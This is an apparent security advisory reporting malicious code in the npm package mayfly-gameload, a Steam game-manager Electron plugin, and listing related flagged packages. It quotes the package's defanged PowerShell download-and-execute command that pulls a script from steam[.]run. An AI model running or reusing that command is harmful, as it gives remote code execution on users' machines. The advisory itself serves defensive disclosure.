LWA-2026-3929 confirmed malware
mayfly-gameload@1.1.0
Malicious code in mayfly-gameload (npm)
T1195.002 · Compromise Software Supply Chain
Analysis
A Steam game-manager Electron plugin whose preload.js exposes installSteamCoreSilent(), which executes powershell -NoProfile -ExecutionPolicy Bypass -Command "irm steam[.]run | iex" — a download-and-execute remote code-execution channel pulling and running script content from steam[.]run, which is not an official Steam domain.
- analyzed by
- Leitwacht
- first seen
- Jun 10, 2026, 01:59 PM
- analyzed
- Jun 10, 2026, 02:03 PM
Related advisories
- lucifer490-v2@1.1.65
- prettier_v1@3.8.4
- ltididp1@1.0.0
- vite-config-optimizer@1.1.4
- chai-check-error@2.1.3
- db-xorma@1.0.2
- os-ulid-void@3.0.2
- solana-core-4@1.0.0
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.